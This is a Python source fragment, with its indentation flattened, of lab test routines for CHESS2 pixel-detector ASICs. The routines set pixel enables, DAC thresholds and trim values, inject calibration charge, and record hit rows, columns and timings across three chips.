logging.info("Using makeCurve......")
####R.TH1.AddDirectory(R.kFALSE)
# thresholdCuts = [0x7ce]
# system.root.readConfig("chess2_config.yml") --- should be in the driver script
#####tf = R.TFile(histFileName, "recreate")
# Turn on one pixel at a time
print("Disable all pixels")
system.feb.Chess2Ctrl0.writeAllPixels(enable=0,chargeInj=0) #chargeInj should be 1 in this line and following 2 lines
system.feb.Chess2Ctrl1.writeAllPixels(enable=0,chargeInj=0)
system.feb.Chess2Ctrl2.writeAllPixels(enable=0,chargeInj=0)
pixels = pixels if (pixels!=None) else [ (row,col) for row in range(nRows) for col in range(nColumns) ]
for (row,col) in pixels:
print("Pixel: (%i,%i)"%(row,col))
system.feb.Chess2Ctrl0.writePixel(enable=1, chargeInj=1, col=col, row=row, trimI= 15) #chargeInj should be 0 in these 3 lines
system.feb.Chess2Ctrl1.writePixel(enable=1, chargeInj=1, col=col, row=row, trimI= 15)
system.feb.Chess2Ctrl2.writePixel(enable=1, chargeInj=1, col=col, row=row, trimI= 15)
####hists_row = [ R.TH1F("row_%i_%i_%i"%(i_asic,row,col),"",128,0,128) for i_asic in range(3) ]
####hists_col = [ R.TH1F("col_%i_%i_%i"%(i_asic,row,col),"",32,0,32) for i_asic in range(3) ]
hists_row = [[], [], []]
hists_col = [[], [], []]
for threshold in thresholdCuts:
####hists = [ R.TH1F("deltaT_%i_%i_%i_%s"%(i_asic,row,col,hex(threshold)),"",100,0,1000) for i_asic in range(3) ] # deltaT in ns
print("Thresholds (system.feb.dac.dacBLRRaw): ", hex(threshold))
hists = [[], [], []]
# system.feb.dac.dacPIXTHRaw.set(threshold)
#system.feb.dac.dacBLRaw.set(threshold+608)
system.feb.dac.dacBLRRaw.set(threshold)
#system.feb.dac.dacBLRaw.set(threshold)
# this delay seems to be very important to enable the comparitor inside the asic to settle. (smaller values tend to make this
# tests to report wrong times
time.sleep(2.0)
system.readAll()
for cnt in range(nCounts):
#time.sleep(0.1)
# start charge injection
system.feb.memReg.chargInjStartEventReg.set(0)
time.sleep(0.1)
#system.feb.chargeInj.calPulseVar.set(1)
system.readAll()
if system.feb.chargeInj.hitDetValid0._rawGet():
row_det = int(system.feb.chargeInj.hitDetRow0._rawGet())
col_det = int(system.feb.chargeInj.hitDetCol0._rawGet())
####hists_row[0].Fill(row_det)
####hists_col[0].Fill(col_det)
hists_row[0].append(row_det)
hists_col[0].append(col_det)
#if (row == row_det) and (col == col_det):
####hists[0].Fill(float(system.feb.chargeInj.hitDetTime0._rawGet()))
hists[0].append(float(system.feb.chargeInj.hitDetTime0._rawGet()))
print("row_det: ",row_det, "col_det", col_det, "system.feb.chargeInj.hitDetTime0: ", float(system.feb.chargeInj.hitDetTime0._rawGet()))
else:
hists[0].append(-1.0)
if system.feb.chargeInj.hitDetValid1._rawGet():
row_det = int(system.feb.chargeInj.hitDetRow1._rawGet())
col_det = int(system.feb.chargeInj.hitDetCol1._rawGet())
####hists_row[1].Fill(row_det)
####hists_col[1].Fill(col_det)
hists_row[1].append(row_det)
hists_col[1].append(col_det)
#if (row == row_det) and (col == col_det):
####hists[1].Fill(float(system.feb.chargeInj.hitDetTime1._rawGet()))
hists[1].append(float(system.feb.chargeInj.hitDetTime1._rawGet()))
print("row_det: ",row_det, "col_det", col_det, "system.feb.chargeInj.hitDetTime1: ", float(system.feb.chargeInj.hitDetTime1._rawGet()))
else:
hists[1].append(-1.0)
if system.feb.chargeInj.hitDetValid2._rawGet():
row_det = int(system.feb.chargeInj.hitDetRow2._rawGet())
col_det = int(system.feb.chargeInj.hitDetCol2._rawGet())
####hists_row[2].Fill(row_det)
####hists_col[2].Fill(col_det)
hists_row[2].append(row_det)
hists_col[2].append(col_det)
#if (row == row_det) and (col == col_det):
####hists[2].Fill(float(system.feb.chargeInj.hitDetTime2._rawGet()))
hists[2].append(float(system.feb.chargeInj.hitDetTime2._rawGet()))
print("row_det: ",row_det, "col_det", col_det, "system.feb.chargeInj.hitDetTime2: ", float(system.feb.chargeInj.hitDetTime2._rawGet()))
else:
hists[2].append(-1.0)
allHists.append(hists)
####[ hist.Write() for hist in hists ]
# for i in range(3):
# fig = matplotlib.figure()
# ax = fig.add_subplot(1, 1, 1)
# n, bins, patches = ax.hist(hists[i], bins=100, range=(0, 1000))
# ax.set_xlabel('Delta T in ns')
# ax.set_ylabel('Frequency')
# fig.savefig("plotDir/deltaT_%i_%i_%i_%s"%(i,row,col,hex(threshold)))
# fig.clf()
####[ print("... ASIC%i %f"%(i_h,hist.GetEntries())) for (i_h,hist) in enumerate(hists) ]
# [ print("... ASIC%i %f"%(i_h,len(hist))) for (i_h,hist) in enumerate(hists) ]
####[ hist.Write() for hist in hists_row ]
####[ hist.Write() for hist in hists_col ]
# for i in range(3):
# fig = matplotlib.figure()
# ax1 = fig.add_subplot(2, 1, 1)
# ax2 = fig.add_subplot(2, 1, 2)
# n, bins, patches = ax1.hist(hists_row[i], bins=128, range=(0, 128))
# ax1.set_xlabel('Row')
# ax1.set_ylabel('Frequency')
# n, bins, patches = ax2.hist(hists_col[i], bins=32, range=(0,32))
# ax2.set_xlabel('Column')
# ax2.set_ylabel('Frequency')
# fig.savefig("plotDir/asic_row_col_%i_%i_%i.png"%(i,row,col))
# fig.clf()
# system.feb.Chess2Ctrl0.writePixel(enable=0, chargeInj=0, col=col, row=row)
# system.feb.Chess2Ctrl1.writePixel(enable=0, chargeInj=0, col=col, row=row)
# system.feb.Chess2Ctrl2.writePixel(enable=0, chargeInj=0, col=col, row=row)
return allHists
# tf.Close()
""" The following test enables to test a set of pixels for all trim values.
The makeCalibCurveLoop function is called to implement the inner loops
for the set of pixels and for the thresholdCuts"""
def makeCalibCurve(system,nCounts,thresholdCuts,pixels=None,histFileName="scurve.root"):
allHists = []
pixEnableLogic = 1
chargeInjLogic = 0
logging.info("Using makeCalibCurve......")
print("Disable all pixels")
system.feb.Chess2Ctrl0.writeAllPixels(enable= not pixEnableLogic,chargeInj= not chargeInjLogic)
system.feb.Chess2Ctrl1.writeAllPixels(enable= not pixEnableLogic,chargeInj= not chargeInjLogic)
system.feb.Chess2Ctrl2.writeAllPixels(enable= not pixEnableLogic,chargeInj= not chargeInjLogic)
#for trim in range(0,16,2):
for trim in range(7,8):
# pixEnableLogic = 1
# chargeInjLogic = 1
# print("Trim, pixEnableLogic, chargeInjLogic: (%i,%i, %i)"%(trim, pixEnableLogic, chargeInjLogic))
# hists = makeCalibCurveLoop(system,nCounts,thresholdCuts,pixels,histFileName, pixEnableLogic = pixEnableLogic, chargeInjLogic = chargeInjLogic, pixTrimI = trim)
# allHists.append(hists)
pixEnableLogic = 1
chargeInjLogic = 0
print("Trim, pixEnableLogic, chargeInjLogic: (%i,%i,%i)"%(trim, pixEnableLogic, chargeInjLogic))
hists = makeCalibCurveLoop(system,nCounts,thresholdCuts,pixels,histFileName, pixEnableLogic = pixEnableLogic, chargeInjLogic = chargeInjLogic, pixTrimI = trim)
allHists.append(hists)
# pixEnableLogic = 0
# chargeInjLogic = 1
# print("Trim, pixEnableLogic, chargeInjLogic: (%i,%i, %i)"%(trim, pixEnableLogic, chargeInjLogic))
# hists = makeCalibCurveLoop(system,nCounts,thresholdCuts,pixels,histFileName, pixEnableLogic = pixEnableLogic, chargeInjLogic = chargeInjLogic, pixTrimI = trim)
# allHists.append(hists)
# pixEnableLogic = 0
# chargeInjLogic = 0
# print("Trim, pixEnableLogic, chargeInjLogic: (%i,%i, %i)"%(trim, pixEnableLogic, chargeInjLogic))
# hists = makeCalibCurveLoop(system,nCounts,thresholdCuts,pixels,histFileName, pixEnableLogic = pixEnableLogic, chargeInjLogic = chargeInjLogic, pixTrimI = trim)
# allHists.append(hists)
return allHists
""" The following test specifies a single pixel memory configuration (pixEnableLogic,
chargeInjLogic and trim). The makeCalibCurveLoop function is called to implement
the inner loops for the set of pixels and for the thresholdCuts"""
def makeCalibCurve2(system,nCounts,thresholdCuts,pixels=None,histFileName="scurve.root"):
allHists = []
logging.info("Using makeCalibCurve2......")
pixEnableLogic = 1
chargeInjLogic = 0
trim = 15
print("Disable all pixels")
system.feb.Chess2Ctrl0.writeAllPixels(enable= not pixEnableLogic,chargeInj= not chargeInjLogic)
system.feb.Chess2Ctrl1.writeAllPixels(enable= not pixEnableLogic,chargeInj= not chargeInjLogic)
system.feb.Chess2Ctrl2.writeAllPixels(enable= not pixEnableLogic,chargeInj= not chargeInjLogic)
print("Trim, pixEnableLogic, chargeInjLogic: (%i,%i,%i)"%(trim, pixEnableLogic, chargeInjLogic))
hists = makeCalibCurveLoop(system,nCounts,thresholdCuts,pixels,histFileName, pixEnableLogic = pixEnableLogic, chargeInjLogic = chargeInjLogic, pixTrimI = trim)
allHists.append(hists)
def makeCalibCurve3(system,nCounts,thresholdCuts,pixels=None,histFileName="scurve.root"):
allHists = []
pixEnable = 1
chargeInj = 0 # 0 - enable / 1 - disabled
trim = 7
system.feb.chargeInj.pulseWidthRaw.set(0x7fff)
print("Disable all pixels")
system.feb.Chess2Ctrl0.writeAllPixels(enable= 0,chargeInj= 1)
system.feb.Chess2Ctrl1.writeAllPixels(enable= 0,chargeInj= 1)
system.feb.Chess2Ctrl2.writeAllPixels(enable= 0,chargeInj= 1)
print("Trim, pixEnable, chargeInj: (%i,%i,%i)"%(trim, pixEnable, chargeInj))
hists = makeCalibCurveLoopTH(system,nCounts,thresholdCuts,pixels,histFileName, pixEnableLogic = pixEnable, chargeInjLogic = chargeInj, pixTrimI = trim)
allHists.append(hists)
return allHists
def configAsicsPreampTest(system = []):
system.feb.Chess2Ctrl0.VNatt.set(0x1e)
system.feb.Chess2Ctrl0.VNres.set(0x1)
system.feb.Chess2Ctrl0.VPLoadatt.set(0x1c)
system.feb.Chess2Ctrl0.VPLoadres.set(0x2)
system.feb.Chess2Ctrl0.VNSFatt.set(0x1f)
system.feb.Chess2Ctrl0.VNSFres.set(0x3)
system.feb.Chess2Ctrl1.VNatt.set(0x1e)
system.feb.Chess2Ctrl1.VNres.set(0x1)
system.feb.Chess2Ctrl1.VPLoadatt.set(0x1c)
system.feb.Chess2Ctrl1.VPLoadres.set(0x2)
system.feb.Chess2Ctrl1.VNSFatt.set(0x1f)
system.feb.Chess2Ctrl1.VNSFres.set(0x3)
system.feb.Chess2Ctrl2.VNatt.set(0x1e)
system.feb.Chess2Ctrl2.VNres.set(0x1)
system.feb.Chess2Ctrl2.VPLoadatt.set(0x1c)
system.feb.Chess2Ctrl2.VPLoadres.set(0x2)
system.feb.Chess2Ctrl2.VNSFatt.set(0x1f)
system.feb.Chess2Ctrl2.VNSFres.set(0x3)
def configAsicsPreampTestRestoreDefaultValues(system = []):
system.feb.Chess2Ctrl0.VNatt.set(0x1F)
system.feb.Chess2Ctrl0.VNres.set(0x0)
system.feb.Chess2Ctrl0.VPLoadatt.set(0x1e)
system.feb.Chess2Ctrl0.VPLoadres.set(0x1)
system.feb.Chess2Ctrl0.VNSFatt.set(0x1b)
system.feb.Chess2Ctrl0.VNSFres.set(0x0)
system.feb.Chess2Ctrl1.VNatt.set(0x1F)
system.feb.Chess2Ctrl1.VNres.set(0x0)
system.feb.Chess2Ctrl1.VPLoadatt.set(0x1e)
system.feb.Chess2Ctrl1.VPLoadres.set(0x1)
system.feb.Chess2Ctrl1.VNSFatt.set(0x1b)
system.feb.Chess2Ctrl1.VNSFres.set(0x0)
system.feb.Chess2Ctrl2.VNatt.set(0x1F)
system.feb.Chess2Ctrl2.VNres.set(0x0)
system.feb.Chess2Ctrl2.VPLoadatt.set(0x1e)
system.feb.Chess2Ctrl2.VPLoadres.set(0x1)
system.feb.Chess2Ctrl2.VNSFatt.set(0x1b)
system.feb.Chess2Ctrl2.VNSFres.set(0x0)
def makeCalibCurve4(system,nCounts,thresholdCuts,pixels=None,histFileName="scurve.root", deltaBLToBLR = 608, chargeInjectionEnbled = 0):
allHists = []
logging.info("Using makeCalibCurve4......")
#ASIC specific configuration selected depending on the test being run
configAsicsPreampTest(system = system)
#configAsicsPreampTestRestoreDefaultValues(system = system)
pixEnable = 1
chargeInj1 = not chargeInjectionEnbled # 0 - enable / 1 - disabled
trim = 7
system.feb.chargeInj.pulseWidthRaw.set(0x7fff)
system.feb.chargeInj.calPulseInh.set(chargeInj1)
print("Disable all pixels")
system.feb.Chess2Ctrl0.writeAllPixels(enable= 0,chargeInj= 1)
system.feb.Chess2Ctrl1.writeAllPixels(enable= 0,chargeInj= 1)
system.feb.Chess2Ctrl2.writeAllPixels(enable= 0,chargeInj= 1)
print("Trim, pixEnable, chargeInj: (%i,%i,%i)"%(trim, pixEnable, chargeInj1))
hists = makeCalibCurveLoopBLx(system,nCounts,thresholdCuts,pixels,histFileName, pixEnableLogic = pixEnable, chargeInjLogic = chargeInj1, pixTrimI = trim, deltaBLToBLR = deltaBLToBLR)
allHists.append(hists)
return allHists
def makeCalibCurveLoop(system,nCounts,thresholdCuts,pixels=None,histFileName="scurve.root", pixEnableLogic = 1, chargeInjLogic = 0, pixTrimI = 0):
nColumns = 32
nRows = 128
allHists = []
logging.info("Using makeCalibCurveLoop......")
# Turn on one pixel at a time
# print("Disable all pixels")
# system.feb.Chess2Ctrl0.writeAllPixels(enable= not pixEnableLogic,chargeInj= not chargeInjLogic)
# system.feb.Chess2Ctrl1.writeAllPixels(enable= not pixEnableLogic,chargeInj= not chargeInjLogic)
# system.feb.Chess2Ctrl2.writeAllPixels(enable= not pixEnableLogic,chargeInj= not chargeInjLogic)
pixels = pixels if (pixels!=None) else [ (row,col) for row in range(nRows) for col in range(nColumns) ]
for (row,col) in pixels:
print("Pixel: (%i,%i)"%(row,col))
system.feb.Chess2Ctrl0.writePixel(enable=pixEnableLogic, chargeInj=chargeInjLogic, col=col, row=row, trimI= pixTrimI)
system.feb.Chess2Ctrl1.writePixel(enable=pixEnableLogic, chargeInj=chargeInjLogic, col=col, row=row, trimI= pixTrimI)
system.feb.Chess2Ctrl2.writePixel(enable=pixEnableLogic, chargeInj=chargeInjLogic, col=col, row=row, trimI= pixTrimI)
####hists_row = [ R.TH1F("row_%i_%i_%i"%(i_asic,row,col),"",128,0,128) for i_asic in range(3) ]
####hists_col = [ R.TH1F("col_%i_%i_%i"%(i_asic,row,col),"",32,0,32) for i_asic in range(3) ]
hists_row = [[], [], []]
hists_col = [[], [], []]
for threshold in thresholdCuts:
####hists = [ R.TH1F("deltaT_%i_%i_%i_%s"%(i_asic,row,col,hex(threshold)),"",100,0,1000) for i_asic in range(3) ] # deltaT in ns
hists = [[], [], []]
# system.feb.dac.dacPIXTHRaw.set(threshold)
#system.feb.dac.dacBLRaw.set(threshold+608)
#print("Thresholds (system.feb.dac.dacBLRRaw): ", hex(threshold))
#system.feb.dac.dacBLRRaw.set(threshold)
print("Thresholds (system.feb.dac.dacBLRaw): ", hex(threshold))
system.feb.dac.dacBLRaw.set(threshold)
# this delay seems to be very important to enable the comparitor inside the asic to settle. (smaller values tend to make this
# tests to report wrong times
time.sleep(2.0)
system.readAll()
for cnt in range(nCounts):
#time.sleep(0.1)
# start charge injection
#system.feb.memReg.chargInjStartEventReg.set(0)
system.feb.chargeInj.calPulseVar.set(1)
time.sleep(0.1)
system.readAll()
if system.feb.chargeInj.hitDetValid0._rawGet():
row_det = int(system.feb.chargeInj.hitDetRow0._rawGet())
col_det = int(system.feb.chargeInj.hitDetCol0._rawGet())
####hists_row[0].Fill(row_det)
####hists_col[0].Fill(col_det)
hists_row[0].append(row_det)
hists_col[0].append(col_det)
#if (row == row_det) and (col == col_det):
####hists[0].Fill(float(system.feb.chargeInj.hitDetTime0._rawGet()))
hists[0].append(float(system.feb.chargeInj.hitDetTime0._rawGet()))
print("row_det: ",row_det, "col_det", col_det, "system.feb.chargeInj.hitDetTime0: ", float(system.feb.chargeInj.hitDetTime0._rawGet()))
else:
hists[0].append(-1.0)
if system.feb.chargeInj.hitDetValid1._rawGet():
row_det = int(system.feb.chargeInj.hitDetRow1._rawGet())
col_det = int(system.feb.chargeInj.hitDetCol1._rawGet())
####hists_row[1].Fill(row_det)
####hists_col[1].Fill(col_det)
hists_row[1].append(row_det)
hists_col[1].append(col_det)
#if (row == row_det) and (col == col_det):
####hists[1].Fill(float(system.feb.chargeInj.hitDetTime1._rawGet()))
hists[1].append(float(system.feb.chargeInj.hitDetTime1._rawGet()))
print("row_det: ",row_det, "col_det", col_det, "system.feb.chargeInj.hitDetTime1: ", float(system.feb.chargeInj.hitDetTime1._rawGet()))
else:
hists[1].append(-1.0)
if system.feb.chargeInj.hitDetValid2._rawGet():
row_det = int(system.feb.chargeInj.hitDetRow2._rawGet())
col_det = int(system.feb.chargeInj.hitDetCol2._rawGet())
####hists_row[2].Fill(row_det)
####hists_col[2].Fill(col_det)
hists_row[2].append(row_det)
hists_col[2].append(col_det)
#if (row == row_det) and (col == col_det):
####hists[2].Fill(float(system.feb.chargeInj.hitDetTime2._rawGet()))
hists[2].append(float(system.feb.chargeInj.hitDetTime2._rawGet()))
print("row_det: ",row_det, "col_det", col_det, "system.feb.chargeInj.hitDetTime2: ", float(system.feb.chargeInj.hitDetTime2._rawGet()))
else:
hists[2].append(-1.0)
allHists.append(hists)
return allHists
def makeCalibCurveLoopBLx(system,nCounts,thresholdCuts,pixels=None,histFileName="scurve.root", pixEnableLogic = 1, chargeInjLogic = 0, pixTrimI = 0, deltaBLToBLR = 608):
nColumns = 32
nRows = 128
allHists = []
logging.info(" Using makeCalibCurveLoopBLx......")
# Turn on one pixel at a time
# print("Disable all pixels")
# system.feb.Chess2Ctrl0.writeAllPixels(enable= not pixEnableLogic,chargeInj= not chargeInjLogic)
# system.feb.Chess2Ctrl1.writeAllPixels(enable= not pixEnableLogic,chargeInj= not chargeInjLogic)
# system.feb.Chess2Ctrl2.writeAllPixels(enable= not pixEnableLogic,chargeInj= not chargeInjLogic)
pixels = pixels if (pixels!=None) else [ (row,col) for row in range(nRows) for col in range(nColumns) ]
for (row,col) in pixels:
print("Pixel: (%i,%i)"%(row,col))
system.feb.Chess2Ctrl0.writePixel(enable=pixEnableLogic, chargeInj=chargeInjLogic, col=col, row=row, trimI= pixTrimI)
system.feb.Chess2Ctrl1.writePixel(enable=pixEnableLogic, chargeInj=chargeInjLogic, col=col, row=row, trimI= pixTrimI)
system.feb.Chess2Ctrl2.writePixel(enable=pixEnableLogic, chargeInj=chargeInjLogic, col=col, row=row, trimI= pixTrimI)
####hists_row = [ R.TH1F("row_%i_%i_%i"%(i_asic,row,col),"",128,0,128) for i_asic in range(3) ]
####hists_col = [ R.TH1F("col_%i_%i_%i"%(i_asic,row,col),"",32,0,32) for i_asic in range(3) ]
hists_row = [[], [], []]
hists_col = [[], [], []]
for threshold in thresholdCuts:
BLRValue = threshold + deltaBLToBLR
####hists = [ R.TH1F("deltaT_%i_%i_%i_%s"%(i_asic,row,col,hex(threshold)),"",100,0,1000) for i_asic in range(3) ] # deltaT in ns
hists = [[], [], []]
#print("Thresholds (system.feb.dac.dacPIXTHRaw): ", hex(threshold))
#system.feb.dac.dacPIXTHRaw.set(threshold)
system.feb.dac.dacBLRRaw.set(BLRValue)
print("Thresholds (system.feb.dac.dacBLRRaw): ", hex(BLRValue))
system.feb.dac.dacBLRaw.set(threshold)
print("Thresholds (system.feb.dac.dacBLRaw): ", hex(threshold))
# system.feb.dac.dacBLRaw.set(threshold)
# this delay seems to be very important to enable the comparitor inside the asic to settle. (smaller values tend to make this
# tests to report wrong times
time.sleep(1.0)
system.readAll()
for cnt in range(nCounts):
#time.sleep(0.1)
# start charge injection
#system.feb.memReg.chargInjStartEventReg.set(0)
system.feb.chargeInj.calPulseVar.set(1)
time.sleep(0.05)
system.readAll()
if system.feb.chargeInj.hitDetValid0._rawGet():
row_det = int(system.feb.chargeInj.hitDetRow0._rawGet())
col_det = int(system.feb.chargeInj.hitDetCol0._rawGet())
####hists_row[0].Fill(row_det)
####hists_col[0].Fill(col_det)
hists_row[0].append(row_det)
hists_col[0].append(col_det)
#if (row == row_det) and (col == col_det):
####hists[0].Fill(float(system.feb.chargeInj.hitDetTime0._rawGet()))
#hists[0].append(float(system.feb.chargeInj.hitDetTimeRaw0._rawGet()))
hists[0].append(float(system.feb.chargeInj.hitDetTime0._rawGet()))
print("row_det: ",row_det, "col_det", col_det, "system.feb.chargeInj.hitDetTime0: ", float(system.feb.chargeInj.hitDetTime0._rawGet()))
else:
hists[0].append(-1.0)
print("row_det: ",-1, ":col_det:", -1, ":system.feb.chargeInj.hitDetTime0: ", float(-1))
if system.feb.chargeInj.hitDetValid1._rawGet():
row_det = int(system.feb.chargeInj.hitDetRow1._rawGet())
col_det = int(system.feb.chargeInj.hitDetCol1._rawGet())
####hists_row[1].Fill(row_det)
####hists_col[1].Fill(col_det)
hists_row[1].append(row_det)
hists_col[1].append(col_det)
#if (row == row_det) and (col == col_det):
####hists[1].Fill(float(system.feb.chargeInj.hitDetTime1._rawGet()))
#hists[1].append(float(system.feb.chargeInj.hitDetTimeRaw1._rawGet()))
hists[1].append(float(system.feb.chargeInj.hitDetTime1._rawGet()))
print("row_det: ",row_det, "col_det", col_det, "system.feb.chargeInj.hitDetTime1: ", float(system.feb.chargeInj.hitDetTime1._rawGet()))
else:
hists[1].append(-1.0)
print("row_det: ",-1, ":col_det:", -1, ":system.feb.chargeInj.hitDetTime1: ", float(-1))
if system.feb.chargeInj.hitDetValid2._rawGet():
row_det = int(system.feb.chargeInj.hitDetRow2._rawGet())
col_det = int(system.feb.chargeInj.hitDetCol2._rawGet())
####hists_row[2].Fill(row_det)
####hists_col[2].Fill(col_det)
hists_row[2].append(row_det)
hists_col[2].append(col_det)
#if (row == row_det) and (col == col_det):
####hists[2].Fill(float(system.feb.chargeInj.hitDetTime2._rawGet()))
#hists[2].append(float(system.feb.chargeInj.hitDetTimeRaw2._rawGet()))
hists[2].append(float(system.feb.chargeInj.hitDetTime2._rawGet()))
print("row_det: ",row_det, "col_det", col_det, "system.feb.chargeInj.hitDetTime2: ", float(system.feb.chargeInj.hitDetTime2._rawGet()))
else:
hists[2].append(-1.0)
print("row_det: ",-1, ":col_det:", -1, ":system.feb.chargeInj.hitDetTime2: ", float(-1))
allHists.append(hists)
return allHists
def makeCalibCurveLoopTH(system,nCounts,thresholdCuts,pixels=None,histFileName="scurve.root", pixEnableLogic = 1, chargeInjLogic = 0, pixTrimI = 0):
nColumns = 32
nRows = 128
allHists = []
logging.info(" Using makeCalibCurveLoopTH......")
# Turn on one pixel at a time
# print("Disable all pixels")
# system.feb.Chess2Ctrl0.writeAllPixels(enable= not pixEnableLogic,chargeInj= not chargeInjLogic)
# system.feb.Chess2Ctrl1.writeAllPixels(enable= not pixEnableLogic,chargeInj= not chargeInjLogic)
# system.feb.Chess2Ctrl2.writeAllPixels(enable= not pixEnableLogic,chargeInj= not chargeInjLogic)
pixels = pixels if (pixels!=None) else [ (row,col) for row in range(nRows) for col in range(nColumns) ]
for (row,col) in pixels:
print("Pixel: (%i,%i)"%(row,col))
system.feb.Chess2Ctrl0.writePixel(enable=pixEnableLogic, chargeInj=chargeInjLogic, col=col, row=row, trimI= pixTrimI)
system.feb.Chess2Ctrl1.writePixel(enable=pixEnableLogic, chargeInj=chargeInjLogic, col=col, row=row, trimI= pixTrimI)
system.feb.Chess2Ctrl2.writePixel(enable=pixEnableLogic, chargeInj=chargeInjLogic, col=col, row=row, trimI= pixTrimI)
####hists_row = [ R.TH1F("row_%i_%i_%i"%(i_asic,row,col),"",128,0,128) for i_asic in range(3) ]
####hists_col = [ R.TH1F("col_%i_%i_%i"%(i_asic,row,col),"",32,0,32) for i_asic in range(3) ]
hists_row = [[], [], []]
hists_col = [[], [], []]
for threshold in thresholdCuts:
####hists = [ R.TH1F("deltaT_%i_%i_%i_%s"%(i_asic,row,col,hex(threshold)),"",100,0,1000) for i_asic in range(3) ] # deltaT in ns
hists = [[], [], []]
print("Thresholds (system.feb.dac.dacPIXTHRaw): ", hex(threshold))
system.feb.dac.dacPIXTHRaw.set(threshold)
#system.feb.dac.dacBLRaw.set(threshold+608)
#print("Thresholds (system.feb.dac.dacBLRRaw): ", hex(threshold))
#system.feb.dac.dacBLRRaw.set(threshold)
# print("Thresholds (system.feb.dac.dacBLRaw): ", hex(threshold))
# system.feb.dac.dacBLRaw.set(threshold)
# this delay seems to be very important to enable the comparitor inside the asic to settle. (smaller values tend to make this
# tests to report wrong times
time.sleep(2.0)
system.readAll()
for cnt in range(nCounts):
#time.sleep(0.1)
# start charge injection
#system.feb.memReg.chargInjStartEventReg.set(0)
system.feb.chargeInj.calPulseVar.set(1)
time.sleep(0.1)
system.readAll()
if system.feb.chargeInj.hitDetValid0._rawGet():
row_det = int(system.feb.chargeInj.hitDetRow0._rawGet())
col_det = int(system.feb.chargeInj.hitDetCol0._rawGet())
####hists_row[0].Fill(row_det)
####hists_col[0].Fill(col_det)
hists_row[0].append(row_det)
hists_col[0].append(col_det)
#if (row == row_det) and (col == col_det):
####hists[0].Fill(float(system.feb.chargeInj.hitDetTime0._rawGet()))
hists[0].append(float(system.feb.chargeInj.hitDetTime0._rawGet()))
print("row_det: ",row_det, "col_det", col_det, "system.feb.chargeInj.hitDetTime0: ", float(system.feb.chargeInj.hitDetTime0._rawGet()))
else:
hists[0].append(-1.0)
print("row_det: ",-1, ":col_det:", -1, ":system.feb.chargeInj.hitDetTime0: ", float(-1))
if system.feb.chargeInj.hitDetValid1._rawGet():
row_det = int(system.feb.chargeInj.hitDetRow1._rawGet())
col_det = int(system.feb.chargeInj.hitDetCol1._rawGet())
####hists_row[1].Fill(row_det)
####hists_col[1].Fill(col_det)
hists_row[1].append(row_det)
hists_col[1].append(col_det)
#if (row == row_det) and (col == col_det):
####hists[1].Fill(float(system.feb.chargeInj.hitDetTime1._rawGet()))
hists[1].append(float(system.feb.chargeInj.hitDetTime1._rawGet()))
print("row_det: ",row_det, "col_det", col_det, "system.feb.chargeInj.hitDetTime1: ", float(system.feb.chargeInj.hitDetTime1._rawGet()))
else:
hists[1].append(-1.0)
print("row_det: ",-1, ":col_det:", -1, ":system.feb.chargeInj.hitDetTime1: ", float(-1))
if system.feb.chargeInj.hitDetValid2._rawGet():
row_det = int(system.feb.chargeInj.hitDetRow2._rawGet())
col_det = int(system.feb.chargeInj.hitDetCol2._rawGet())
####hists_row[2].Fill(row_det)
####hists_col[2].Fill(col_det)
hists_row[2].append(row_det)
hists_col[2].append(col_det)
#if (row == row_det) and (col == col_det):
####hists[2].Fill(float(system.feb.chargeInj.hitDetTime2._rawGet()))
hists[2].append(float(system.feb.chargeInj.hitDetTime2._rawGet()))
print("row_det: ",row_det, "col_det", col_det, "system.feb.chargeInj.hitDetTime2: ", float(system.feb.chargeInj.hitDetTime2._rawGet()))
else:
hists[2].append(-1.0)
print("row_det: ",-1, ":col_det:", -1, ":system.feb.chargeInj.hitDetTime2: ", float(-1))
allHists.append(hists)
return allHists
def swingTHvsBL(system,nCounts,thresholdCuts,pixels=None,histFileName="scurve.root"):
allHists = []
logging.info("Using swingTHvsBL......")
pixEnable = 1
chargeInj = 1
trim = 15
#
system.feb.dac.dacPIXTHRaw.set(0x9ce)
system.feb.dac.dacBLRRaw.set(0x5c2)
system.feb.dac.dacBLRaw.set(0x5c2)
#
system.feb.memReg.initValueReg.set(0x0)
system.feb.memReg.endValueReg.set(0xfff)
system.feb.memReg.delayValueReg.set(0x5)
print("Disable all pixels")
system.feb.Chess2Ctrl0.writeAllPixels(enable= 0,chargeInj= 1)
system.feb.Chess2Ctrl1.writeAllPixels(enable= 0,chargeInj= 1)
system.feb.Chess2Ctrl2.writeAllPixels(enable= 0,chargeInj= 1)
print("Trim, pixEnable, chargeInj: (%i,%i,%i)"%(trim, pixEnable, chargeInj))
hists = SwingThLoopBLx(system,nCounts,thresholdCuts,pixels,histFileName, pixEnableLogic = pixEnable, chargeInjLogic = chargeInj, pixTrimI = trim, vs = 'BL')
allHists.append(hists)
return allHists
def swingTHvsBLR(system,nCounts,thresholdCuts,pixels=None,histFileName="scurve.root"):
allHists = []
pixEnable = 1
chargeInj = 1
trim = 15
#
system.feb.dac.dacPIXTHRaw.set(0x9ce)
system.feb.dac.dacBLRRaw.set(0x5c2)
system.feb.dac.dacBLRaw.set(0x5c2)
#
system.feb.memReg.initValueReg.set(0x0)
system.feb.memReg.endValueReg.set(0xfff)
system.feb.memReg.delayValueReg.set(0x5)
print("Disable all pixels")
system.feb.Chess2Ctrl0.writeAllPixels(enable= 0,chargeInj= 1)
system.feb.Chess2Ctrl1.writeAllPixels(enable= 0,chargeInj= 1)
system.feb.Chess2Ctrl2.writeAllPixels(enable= 0,chargeInj= 1)
print("Trim, pixEnable, chargeInj: (%i,%i,%i)"%(trim, pixEnable, chargeInj))
hists = SwingThLoopBLx(system,nCounts,thresholdCuts,pixels,histFileName, pixEnableLogic = pixEnable, chargeInjLogic = chargeInj, pixTrimI = trim, vs = 'BLR')
allHists.append(hists)
return allHists
def SwingThLoopBLx(system,nCounts,thresholdCuts,pixels=None,histFileName="scurve.root", pixEnableLogic = 1, chargeInjLogic = 0, pixTrimI = 0, vs = 'BL'):
nColumns = 32
nRows = 128
allHists = []
logging.info("Using SwingThLoopBLx......")
pixels = pixels if (pixels!=None) else [ (row,col) for row in range(nRows) for col in range(nColumns) ]
for (row,col) in pixels:
print("Pixel: (%i,%i)"%(row,col))
system.feb.Chess2Ctrl0.writePixel(enable=pixEnableLogic, chargeInj=chargeInjLogic, col=col, row=row, trimI= pixTrimI)
system.feb.Chess2Ctrl1.writePixel(enable=pixEnableLogic, chargeInj=chargeInjLogic, col=col, row=row, trimI= pixTrimI)
system.feb.Chess2Ctrl2.writePixel(enable=pixEnableLogic, chargeInj=chargeInjLogic, col=col, row=row, trimI= pixTrimI)
hists_row = [[], [], []]
